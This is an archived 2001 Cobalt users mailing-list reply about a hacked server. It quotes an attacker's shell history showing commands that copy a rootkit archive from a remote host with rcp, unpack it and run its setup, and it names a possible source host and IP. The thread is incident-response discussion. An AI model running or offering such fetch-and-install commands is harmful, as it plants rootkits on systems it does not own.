[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Recent Hacks

Subject: RE: [cobalt-users] Recent Hacks
From: Jonathan Nichols <jnichols@xxxxxxxxxxxxxxxxx>
Date: Mon Feb 12 16:57:04 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

 > i've also found this:


 [root@www /root]# cat /.bash_history
 id;mkdir /tmp/.new;cd /tmp/.new;rcp
 adm@xxxxxxxxxxxxx:/var/adm/rh6kit.tar.gz
 ./;
 gzip -d rh6kit.tar.gz;
 tar -xvf rh6kit.tar;./setup;id;


Name:    fresgisvr.frostburg.edu
Address:  131.118.94.22

That might be a place to look for your attacker...

_______________________________________________


Wow, all the semicolons.. looks like a cut/paste skript kiddie job. =/

I'd get in touch with someone at frostburg.edu and let them know thattheir resources are being used for evil purposes.

References:
- RE: [cobalt-users] Recent Hacks
  - From: Reinoud van Leeuwen

Prev by Date: RE: [cobalt-users] reccomendations for a collocation company
Next by Date: [cobalt-users] Re: BIND and DNS Question
Previous by thread: Re: [cobalt-users] Recent Hacks
Next by thread: Re: [cobalt-users] Recent Hacks

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index